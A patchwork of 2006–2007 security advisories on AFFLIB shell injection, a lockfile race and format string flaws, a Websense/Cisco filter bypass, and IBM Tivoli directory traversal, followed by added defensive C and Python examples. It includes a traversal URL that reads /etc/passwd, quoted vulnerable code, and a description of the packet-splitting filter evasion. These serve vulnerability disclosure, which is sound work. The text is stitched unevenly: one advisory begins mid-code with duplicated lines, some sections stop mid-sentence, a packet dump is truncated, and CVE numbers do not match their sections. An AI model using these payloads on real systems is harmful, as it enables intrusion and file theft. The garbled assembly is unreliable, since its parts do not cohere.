CVE Candidate: CVE-2007-2055
    Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-shellinject.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:
From the forensicswiki.org website [1]:

  "The Advanced Forensics Format (AFF) is an extensible open format for the
   storage of disk images and related forensic metadata. It was developed by
   Simson Garfinkel and Basis Technology."

AFFLIB(TM) is the reference implementation of the AFF(TM) format, written
primarily by Simson Garfinkel. It comes in the form of an open source library
and a set of command line tools used to manipulate AFF(TM) files.

Vulnerability Overview:
In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security
code review of AFFLIB(TM) as a part of an internal tool assessment process.
As a result, multiple vulnerabilities of varying severities were discovered.
The most significant of these vulnerabilities are being announced publicly
to raise awareness and help end-users secure themselves against potential
attack.

VSR found that user-supplied command line parameters were used in several
popen() calls without validation or escaping. The attack vectors available
are limited, which reduces the overall severity of these problems. These
vulnerabilities remain exploitable in the latest release (2.2.8), even though
an attempt was made to check for a set of shell metacharacters.

All line numbers listed below are from version 2.2.0.
Vulnerability Details:
The following sections include detailed descriptions of the specific
instances of shell metacharacter injection found during the assessment.

* Shell Command Injections in Decompression Calls *

File: tools/afconvert.cpp
Lines: 245, 255
Platforms Affected: Unix

Description:
A command line parameter is used without validation or escaping in a popen()
call. If this command (or this function) receives parameters from an
untrusted source, code execution would be a major risk. Lines 240-257 are
included below for illustration:

  /* Check to see if it is a gzip file... */
  if(probe_gzip(infile) && yesno("infile looks like a gzip file","Uncompress it","Uncompressing")){
      /* Open with a subprocess. We will need to use zlib when we move to Windows. */
      char buf[256];
      sprintf(buf,"gzcat %s",infile);
      a_in = af_popen(buf,"r");
  }

  /* Check to see if it is a bzip2 file... */
  if(!a_in && probe_bzip2(infile) && yesno("infile looks like a bzip2 file","Uncompress it","Uncompressing")){
      /* Open with a subprocess. We will need to use bzip2zlib when we move to Windows. */
      char buf[256];
      sprintf(buf,"bzcat %s",infile);
      a_in = af_popen(buf,"r");
  }

Since af_popen() ultimately uses the popen() system call, and infile comes
directly from a command line parameter, command line special characters
could be injected if an attacker could control the input.

* Shell Command Injection in Unused get_parameter Function *

File: aimage/ident.cpp
Line: 190
Platforms Affected: Unix

Description:
A function parameter is used without validation or escaping in a popen()
call. If this function (get_parameter) received arguments from an untrusted
source, code execution would be a major risk. This function does not appear
to be called at this time.

Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31.
The following timeline outlines the responses from the vendor regarding this
issue:

2007-04-01 - Vendor provided details of all vulnerabilities identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple security
             fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
             remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed
             in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify
             VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected version
             2.2.8 and found that no additional vulnerabilities were fixed.
             VSR advisories published
AFFLIB(TM): Time-of-Check-Time-of-Use File Race
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Time-of-Check-Time-of-Use File Race in AFFLIB
 Release Date: 2007-04-27
  Application: AFFLIB(TM)
     Versions: 2.2.0-2.2.8 and likely earlier versions.
     Severity: Low
       Author: Timothy D. Morgan <tmorgan {at} vsecurity {dot} com>
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2056
    Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-toctou.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:
From the forensicswiki.org website [1]:

  "The Advanced Forensics Format (AFF) is an extensible open format for the
   storage of disk images and related forensic metadata. It was developed by
   Simson Garfinkel and Basis Technology."

AFFLIB(TM) is the reference implementation of the AFF(TM) format, written
primarily by Simson Garfinkel. It comes in the form of an open source library
and a set of command line tools used to manipulate AFF(TM) files.

Vulnerability Overview:
In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security
code review of AFFLIB(TM) as a part of an internal tool assessment process.
As a result, multiple vulnerabilities of varying severities were discovered.
The most significant of these vulnerabilities are being announced publicly
to raise awareness and help end-users secure themselves against potential
attack.

A time-of-check-time-of-use race was discovered in AFFLIB(TM) which could
allow an attacker on the local machine to overwrite an arbitrary file.
Because the content of the file would not be controllable by an attacker, it
is unlikely that this vulnerability is exploitable for more than a
denial-of-service. This vulnerability remains in the latest version (2.2.8)
despite several notifications to the vendor.

All line numbers listed below are from version 2.2.0.
Vulnerability Details:

File: aimage/aimage.cpp
Lines: 554-575
Platforms Affected: Unix

Description:
The lockfile is created under /tmp with a mostly predictable name. An access
check is first performed, and later the file is opened, truncating it if it
already exists. Since the time of check and time of use are not the same, a
filesystem race could be exploited by a local attacker through the use of a
symlink. Lines 548-582 are included below to illustrate the problem:

  int getlock(class imager *im)
  {
      /* If the file exists and the PID in the file is running,
       * can't get the lock.
       */
      char lockfile[MAXPATHLEN];
      sprintf(lockfile,"/tmp/aimge.%s.lock",im->infile);
      if(access(lockfile,F_OK)==0){
          /* Lockfile exists. Get it's pid */
          char buf[1024];
          FILE *f = fopen(lockfile,"r");
          if(!f){
              perror(lockfile);   // can't read lockfile...
              return -1;
          }
          fgets(buf,sizeof(buf),f);
          buf[sizeof(buf)-1] = 0;
          int pid = atoi(buf);
          if(checkpid(pid)==0){
              /* PID is not running; we can delete the lockfile */
              if(unlink(lockfile)){
                  err(1,"could not delete lockfile %s: ",lockfile);
              }
          }
          /* PID is running; generate error */
          errx(1,"%s is locked by process %d\n",im->infile,pid);
      }
      FILE *f = fopen(lockfile,"w");
      if(!f){
          err(1,lockfile);
      }
      fprintf(f,"%d\n",getpid());   // save our PID.
      fclose(f);
      return 0;
  }

This is likely only exploitable for a denial-of-service condition, since the
attacker would have little control over the content being written (the
process ID of aimage).

Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following timeline
outlines the responses from the vendor regarding this issue:

2007-04-01 - Vendor provided details of all vulnerabilities identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple security
             fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
             remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed
             in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify
             VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected version
             2.2.8 and found that no additional vulnerabilities were fixed.
             VSR advisories published.

Recommendation:
AFFLIB(TM) users should upgrade to the newest version. Third-party
AFFLIB(TM): Multiple Format String Injections
                  ){
              /* PID is not running; we can delete the lockfile */
              if(unlink(lockfile)){
                  err(1,"could not delete lockfile %s: ",lockfile);
              }
          }
          /* PID is running; generate error */
          errx(1,"%s is locked by process %d\n",im->infile,pid);
      }
      FILE *f = fopen(lockfile,"w");
      if(!f){
          err(1,lockfile);

Since the im->infile value could be specified by a user, the lockfile string
could contain format string characters. An attacker could exploit this
problem if the aimage binary were setuid/setgid, or if the aimage program
were executed in a CGI script or something similar.

* Format String Injection in imager *

File: aimage/imager.cpp
Line: 265

Description:
A command line parameter is used as the format string in the err() call. If
an attacker could control this name, a format string injection vulnerability
could be exploited.

* Format String Injection in afxml *

File: tools/afxml.cpp
Line: 101

Description:
A command line parameter is used as the format string in the err() call. If
an attacker could control this name, a format string injection vulnerability
could be exploited.

Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following timeline
outlines the responses from the vendor regarding this issue:

2007-04-01 - Vendor provided details of all vulnerabilities identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple security
             fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
             remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed
             in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify
             VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected version
             2.2.8 and found that no additional vulnerabilities were fixed.
             VSR advisories published.

Recommendation:
AFFLIB(TM) users should upgrade to the newest version.
Third-party projects which rely on AFFLIB(TM) should encourage users to
upgrade, and/or incorporate fixes into their distribution of the library.
The update is available via:

  http://www.afflib.org/downloads/

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned the
following name to these issues. This is a candidate for inclusion in the CVE
list (http://cve.mitre.org), which standardizes names for security problems.

  CVE-2007-2054

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:
1. AFF - Forensics Wiki
   http://www.forensicswiki.org/wiki/AFF

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

This advisory is distributed for educational purposes only, and comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose. Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Vulnerability Disclosure Policy:
http://www.vsecurity.com/disclosurepolicy.html

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

AFF(TM) and AFFLIB(TM) are trademarks of Simson Garfinkel and Basis
Technology Corp. Included source code excerpts are copyright Simson Garfinkel
and Basis Technology Corp. This advisory is copyright (C) 2007 Virtual
Security Research, LLC. All rights reserved.
VSR Advisory: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: WebSense content filter bypass when deployed in conjunction
               with Cisco filtering devices
 Release Date: 2006-05-08
  Application: Websense in Conjunction with Cisco PIX
      Version: Websense 5.5.2
               Cisco PIX OS / ASA 7.0.4.12
               Cisco PIX OS 6.3.5(112)
               FWSM 2.3.x
               FWSM 3.x
               (other versions untested)
     Severity: Low
       Author: George D. Gal <ggal_at_vsecurity.com>
Vendor Status: Vendor Notified, Fix Available
CVE Candidate: CVE-2006-0515
    Reference: http://www.vsecurity.com/bulletins/advisories/2006/cisco-websense-bypass.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:
From the WebSense website [1]:

  "Websense Enterprise, the industry-leading web filtering solution, improves
   employee productivity, reduces legal liability, and optimizes the use of
   IT resources. Websense Enterprise integrates seamlessly with leading
   network infrastructure products to offer unequaled flexibility and
   control."

Vulnerability Overview:
On August 9th, 2005 VSR identified the ability to bypass the Websense URL
filtering capabilities when used in conjunction with the Cisco PIX for web
content filtering. Shortly thereafter another security researcher
[sledge.hammer(a+t)sinhack.net] published [2] a proof-of-concept for evading
the URL filtering performed by Websense, claiming that Websense had failed to
address the issue. However, the vulnerability has been verified by Cisco as a
problem which lies within its handling of filtered requests.

Vulnerability Details:
The vulnerability exists primarily due to the manner in which Cisco PIX and
other Cisco filtering devices handle split packets in conjunction with
Websense Enterprise integration.
For each HTTP request the Cisco PIX or other Cisco device forwards individual
packets to Websense to determine whether or not the request should be
permitted. However, when splitting the HTTP request into two or more packets
on the HTTP method it is possible to circumvent the filtering mechanism.
Additionally, requests using this fragmented approach do not appear to be
logged within Websense, indicating that the request is never sent to Websense
for policy inspection.

The simplest form required to exploit this vulnerability is to fragment the
first character of the HTTP request, followed by a single TCP packet for
subsequent data (e.g. setting the PSH flag on the individual packets).

Virtual Security Research has created a utility [3] to demonstrate the
ability to bypass Websense filtering for the affected versions of Cisco
filtering devices enumerated in this advisory header. You may download and
run this utility at your own risk from:

  http://www.vsecurity.com/tools/WebsenseBypassProxy.java

The following Snort output demonstrates the fragmented request capable of
bypassing Websense:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
11/04-10:06:36.260991 0:B:DB:DE:19:87 -> 0:0:C:7:AC:5 type:0x800 len:0x43
10.254.5.113:58034 -> 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1534 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0xF5B80F51  Ack: 0x21D6E47  Win: 0x8040  TcpLen: 32
TCP Options (3) => NOP NOP TS: 148674 160066961
47                                               G

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/04-10:06:36.359288 0:30:7B:93:19:4C -> 0:B:DB:DE:19:87 type:0x800 len:0x42
82.165.25.125:80 -> 10.254.5.113:58034 TCP TTL:49 TOS:0x0 ID:36972 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x21D6E47  Ack: 0xF5B80F52  Win: 0x16A0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 160066973 148674

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

11/04-10:06:36.359387 0:B:DB:DE:19:87 -> 0:0:C:7:AC:5 type:0x800 len:0x185
10.254.5.113:58034 -> 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1535 IpLen:20 DgmLen:375 DF
***AP*** Seq: 0xF5B80F52  Ack: 0x21D6E47  Win: 0x8040  TcpLen: 32
TCP Options (3) => NOP NOP TS: 148683 160066973
45 54 20 2F 66 61 76 69 63 6F 6E 2E 69 63 6F 20  ET /favicon.ico 
48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20  HTTP/1.1..Host: 
77 77 77 2E 70 68 72 61 63 6B 2E 6F 72 67 0D 0A  www.phrack.org..
55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69  User-Agent: Mozi
6C 6C 61 2F 35 2E 30 20 28 58 31 31 3B 20 55 3B  lla/5.0 (X11; U;
20 46 72 65 65 42 53 44 20 69 33 38 36 3B 20 65   FreeBSD i386; e
6E 2D 55 53 3B 20 72 76 3A 31 2E 37 2E 39 29 20  n-US; rv:1.7.9) 
47 65 63 6B 6F 2F 32 30 30 35 30 37 31 38 20 46  Gecko/20050718 F
69 72 65 66 6F 78 2F 31 2E 30 2E 35 0D 0A 41 63  irefox/1.0.5..Ac
63 65 70 74 3A 20 69 6D 61 67 65 2F 70 6E 67 2C  cept: image/png,
2A 2F 2A 3B 71 3D 30 2E
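Why the split works, and what an inspecting device has to do about it: a check applied to each TCP segment on its own never sees a method token, because "G" and "ET /favicon.ico ..." each fail it, while a check applied to the stream reassembled by sequence number recognises the request. This is an added example, not VSR's utility or any vendor's code; the segment payloads are constructed from the capture above and the function names are assumptions.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* One TCP segment's payload as a filtering device would receive it. */
struct segment {
    uint32_t seq;        /* sequence number of the first payload byte */
    const char *data;
    size_t len;
};

static int by_seq(const void *a, const void *b)
{
    uint32_t x = ((const struct segment *)a)->seq;
    uint32_t y = ((const struct segment *)b)->seq;
    return (x > y) - (x < y);
}

/* Per-segment check, the behaviour the advisory describes: a method token is
 * looked for only at the start of the single buffer handed in.  Returns 1
 * when the buffer would be forwarded for policy lookup, 0 otherwise. */
int looks_like_http_request(const char *data, size_t len)
{
    static const char *const methods[] = { "GET ", "POST ", "HEAD ", "PUT ", "DELETE " };
    for (size_t i = 0; i < sizeof methods / sizeof methods[0]; i++) {
        size_t m = strlen(methods[i]);
        if (len >= m && memcmp(data, methods[i], m) == 0)
            return 1;
    }
    return 0;
}

/* Stream-aware check: orders the segments by sequence number, requires them
 * to be contiguous, concatenates the payloads into out, and applies the same
 * test to the reassembled bytes.  Returns 1 or 0 like the check above, or
 * -1 when there is a gap (more data must arrive before deciding) or the
 * data does not fit in out. */
int stream_is_http_request(struct segment *segs, size_t n, char *out, size_t outsz)
{
    if (n == 0)
        return -1;
    qsort(segs, n, sizeof *segs, by_seq);
    size_t used = 0;
    uint32_t expect = segs[0].seq;
    for (size_t i = 0; i < n; i++) {
        if (segs[i].seq != expect)
            return -1;                   /* hole in the stream */
        if (used + segs[i].len >= outsz)
            return -1;                   /* exceeds the reassembly window */
        memcpy(out + used, segs[i].data, segs[i].len);
        used += segs[i].len;
        expect += (uint32_t)segs[i].len;
    }
    out[used] = '\0';
    return looks_like_http_request(out, used);
}

/* Demonstration built from the capture above: "G" in the segment at
 * 0xF5B80F51, the rest of the request at 0xF5B80F52 (constructed, headers
 * shortened).  Reports each per-segment verdict and the stream verdict. */
void demo_split_request(int *first, int *second, int *reassembled)
{
    const char *tail = "ET /favicon.ico HTTP/1.1\r\nHost: www.phrack.org\r\n";
    struct segment segs[] = {
        { 0xF5B80F52u, tail, strlen(tail) },
        { 0xF5B80F51u, "G", 1 },
    };
    *first  = looks_like_http_request(segs[1].data, segs[1].len);   /* 0 */
    *second = looks_like_http_request(segs[0].data, segs[0].len);   /* 0 */
    char buf[256];
    *reassembled = stream_is_http_request(segs, 2, buf, sizeof buf); /* 1 */
}
```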
VSR Advisory: IBM Tivoli Access Manager - Web Server Plug-in File Retrieval Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                        Virtual Security Research, LLC.
                          http://www.vsecurity.com/
                             Security Advisory

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
   Advisory Name: Remote Directory Traversal and File Retrieval
    Release Date: 2006-02-03
     Application: IBM Tivoli Access Manager
         Version: 5.1.0.10, 6.0.0 (other versions untested)
        Severity: High
          Author: Timothy D. Morgan [EMAIL PROTECTED]
   Vendor Status: Vendor Notified, Fix Available
   CVE Candidate: CVE-2006-0513
       Reference: http://www.vsecurity.com/bulletins/advisories/2006/tam-file-retrieval.txt
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description:

From IBM's Website[1][2]:

  IBM Tivoli Access Manager for e-business is an award winning, policy-based access control solution for e-business and enterprise applications that is in the leader quadrant of Gartner's Magic Quadrant. Tivoli Access Manager for e-business can help you manage growth and complexity, control escalating management costs and address the difficulties of implementing security policies across a wide range of Web and application resources.

  Tivoli Access Manager Plug-in for Web Servers enforces a high degree of security in a secure domain by requiring each client to provide proof of identity. Comprehensive network security can be provided by having Tivoli Access Manager Plug-in for Web Servers control the authentication and authorization of clients.

Vulnerability Overview:

On December 1st, while conducting a penetration test of a TAM-enabled web application, VSR identified a vulnerability in the Tivoli Web Server Plug-in, which is a component of Tivoli Access Manager (TAM). This flaw allows an authenticated attacker to retrieve files which reside outside of the web root from the web server on which the plug-in resides. It is possible to retrieve any file or list any directory which is readable by the web server software.

Vulnerability Details:

IBM's TAM Plug-in contains a logout handler under the root web path named `pkmslogout'. This handler is designed to log out authenticated users. The handler's display template can be specified by the `filename' request parameter. The value of this parameter is intended to be the partial path to a file on the web server which contains the page template. This file path is vulnerable to directory traversal, and can be used to retrieve nearly arbitrary files from the web server hosting the TAM Plug-in. For instance, if a vulnerable plug-in existed on the system tam.example.com, one could exploit the problem by hitting a URL such as:

  http://tam.example.com/pkmslogout?filename=../../../../../../../etc/passwd

It appears this problem can only be triggered when the attacker is already authenticated through the Web Plug-in.

Vendor Response:

IBM was first notified on 2005-12-05. The initial response was received on 2005-12-06. A patch for this issue (for version 5.1.0) was released on 2006-01-18 and published as a limited availability fix: 5.1.0-TIV-WPI-LA0016. Generally available fix packs for versions 5.1.0 and 6.0 were released by the vendor on 2006-02-03:

  Fixpack 5.1.0-TIV-WPI-FP0017 is available at:
    http://www-1.ibm.com/support/docview.wss?uid=swg24011562

  Fixpack 6.0.0-TIV-WPI-FP0001 is available at:
    http://www-1.ibm.com/support/docview.wss?uid=swg24011561

Recommendation:

Apply the relevant fix packs available from IBM.

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

  CVE-2006-0513

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. IBM Tivoli Access Manager for e-business - Product overview
   http://www-306.ibm.com/software/tivoli/products/access-mgr-e-bus/

2. IBM Tivoli Access Manager Plug-in for Web Servers Authentication
   http://publib.boulder.ibm.com/infocenter/tivihelp/v2r1/topic/com.ibm.itame2.doc_5.1/am51_webservers_guide26.htm

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Greetings to: Hotsauce, Beans, and Cornbread

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Copyright 2006 Virtual Security Research, LLC. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFD4+rATY6Rj3GeBOoRAi+eAJ43hbN4SCozKwEVi7q9UVWjtSTe+gCglrwN
BjxuwG+YiPsBpIQfA0CYM6k=
=GGKM
-----END PGP SIGNATURE-----
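The root cause described in the TAM advisory is a template name taken from a request parameter and joined onto a directory on disk without confining the result. The following Python is an added example written for this page, not IBM's code and not the plug-in's logic: it places the naive join that lets a `filename' value climb out of the template directory beside a check that resolves the path and refuses anything outside the root. The template root, the file names and the helper functions are assumptions, and the sample parameter values (including the advisory's own `../../../../../../../etc/passwd') are constructed for the demonstration.

```python
"""Confining a user-supplied template name to a template directory.

Added example, not IBM's code.  naive_template_path() shows the
vulnerable pattern; safe_template_path() shows the check that would have
prevented traversal.  All paths are constructed in a temporary directory.
"""
import os
import tempfile
from pathlib import Path


def naive_template_path(root: str, filename: str) -> str:
    """The vulnerable pattern: the parameter is glued onto the root and
    every '..' component (or a leading '/') is honoured by the OS."""
    return os.path.normpath(os.path.join(root, filename))


def safe_template_path(root: str, filename: str) -> Path:
    """Resolve filename under root and refuse anything that escapes it,
    whether via '..', an absolute path, a NUL byte or a symlink."""
    root_p = Path(root).resolve()
    if not filename or "\x00" in filename or os.path.isabs(filename):
        raise ValueError("invalid template name")
    candidate = (root_p / filename).resolve()
    if candidate != root_p and root_p not in candidate.parents:
        raise ValueError("template path escapes the template root")
    return candidate


# Constructed sample parameter values, including the advisory's payload.
SAMPLE_FILENAMES = [
    "logout.html",                        # the intended use
    "../../../../../../../etc/passwd",    # the advisory's traversal
    "sub/../logout.html",                 # normalises back inside the root
    "/etc/passwd",                        # os.path.join() discards the root
]


def evaluate(root: str, filenames=SAMPLE_FILENAMES) -> dict:
    """Return {filename: (naive path stayed inside root, safe check accepted)}."""
    root_p = Path(root).resolve()
    results = {}
    for name in filenames:
        naive = Path(naive_template_path(root, name)).resolve()
        naive_inside = naive == root_p or root_p in naive.parents
        try:
            safe_template_path(root, name)
            accepted = True
        except ValueError:
            accepted = False
        results[name] = (naive_inside, accepted)
    return results


def demo_in_tempdir() -> dict:
    """Build a throwaway template root (assumed layout) and evaluate the samples."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "templates")
        os.makedirs(root)
        Path(root, "logout.html").write_text("<html>logged out</html>\n")
        return evaluate(root)


if __name__ == "__main__":
    for name, (naive_inside, accepted) in demo_in_tempdir().items():
        print(f"{name!r:40} naive stays in root: {naive_inside!s:5} "
              f"safe check accepts: {accepted}")
```

The check resolves both the root and the candidate before comparing them, so a symlink inside the template directory that points elsewhere is rejected as well; a purely lexical check on the string would miss that case.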